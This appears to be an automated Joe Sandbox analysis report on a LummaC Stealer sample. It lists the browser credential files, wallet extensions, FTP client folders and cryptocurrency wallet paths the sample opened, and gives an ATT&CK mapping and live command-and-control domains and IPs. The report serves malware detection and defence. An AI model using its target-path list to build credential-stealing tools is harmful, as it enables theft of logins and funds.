Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior

Source: Yara match

File source: Process Memory Space: Superority.exe1.exe PID: 5988, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.Superority.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Superority.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2375512214.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Superority.exe1.exe	56%	Virustotal		Browse
Superority.exe1.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer
Superority.exe1.exe	100%	Avira	TR/Dropper.MSIL.Gen

Source	Detection	Scanner	Label
https://astralconnec.icu/w	100%	Avira URL Cloud	malware
https://astralconnec.icu/	100%	Avira URL Cloud	malware
https://astralconnec.icu:443/DPowko	100%	Avira URL Cloud	malware
https://astralconnec.icu/O	100%	Avira URL Cloud	malware
https://astralconnec.icu/DPowko4	100%	Avira URL Cloud	malware
https://astralconnec.icu/DPowkoT	100%	Avira URL Cloud	malware
https://astralconnec.icu/DPowkor	100%	Avira URL Cloud	malware
https://astralconnec.icu/DPowko	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high
astralconnec.icu	104.21.77.86	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/asdawfq	false		high
https://astralconnec.icu/DPowko	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://astralconnec.icu/w	Superority.exe1.exe, 00000001.00000002.2376638644.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://astralconnec.icu:443/DPowko	Superority.exe1.exe, 00000001.00000002.2376204564.0000000001422000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://astralconnec.icu/	Superority.exe1.exe, 00000001.00000002.2376638644.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://t.me/asd	Superority.exe1.exe, 00000001.00000002.2375772181.0000000000F9A000.00000004.00000010.00020000.00000000.sdmp	false		high
https://astralconnec.icu/DPowko4	Superority.exe1.exe, 00000001.00000002.2376638644.00000000014A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://astralconnec.icu/DPowkoT	Superority.exe1.exe, 00000001.00000002.2376204564.000000000143D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://astralconnec.icu/O	Superority.exe1.exe, 00000001.00000002.2376638644.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://astralconnec.icu/DPowkor	Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.77.86	astralconnec.icu	United States		13335	CLOUDFLARENETUS	false
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1633708
Start date and time:	2025-03-10 15:29:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Superority.exe1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/6@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 41 Number of non-executed functions: 59
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.12.23.50, 20.190.160.14, 23.60.203.209
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:31:10	API Interceptor	7x Sleep call for process: Superority.exe1.exe modified
10:31:11	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.77.86	http://unicobag.net/	Get hash	malicious	Unknown	Browse	unicobag.net/
